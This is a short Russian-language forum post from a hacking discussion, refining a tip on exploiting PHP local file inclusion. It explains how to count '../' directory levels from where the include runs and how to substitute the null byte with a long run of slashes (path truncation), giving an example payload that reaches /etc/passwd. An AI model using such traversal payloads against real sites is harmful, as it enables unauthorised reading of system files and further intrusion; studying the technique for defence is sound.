Показать сообщение отдельно
Старый 23.09.2010, 12:34   #26
v1d0q
 
Аватар для v1d0q
 
Регистрация: 09.07.2010
Сообщений: 91
Репутация: 85
По умолчанию

Хотелось немного уточнить на счет дополнения от tipsy, как именно может быть косяк. Если допустим имеем инклуд типа:

index.php?script=file

Код HTML:
include(folder/file.php)
Но сам include обрабатывается допустим по адрессу

Код HTML:
/red/main.php
Для того чтобы выполнить include для файла index.php, который находится в корне => /, следует общаться на 2 папки вверх, т.е.:

Код HTML:
index.php?script=../../index
Include будет работать в обоих случаях (с "../" и "../../"), но заменить null байт с помощью //[n]// в первом варианте получится.

Подсчет нужно вести учитывая папку "red", т.е.:

Код HTML:
"/home/www/site/"+"folder/"+"red/../../../../../etc////////////[40xx]///////////passwd"
Tnx tipsy за помощь в поиске ответов.
v1d0q вне форума   Ответить с цитированием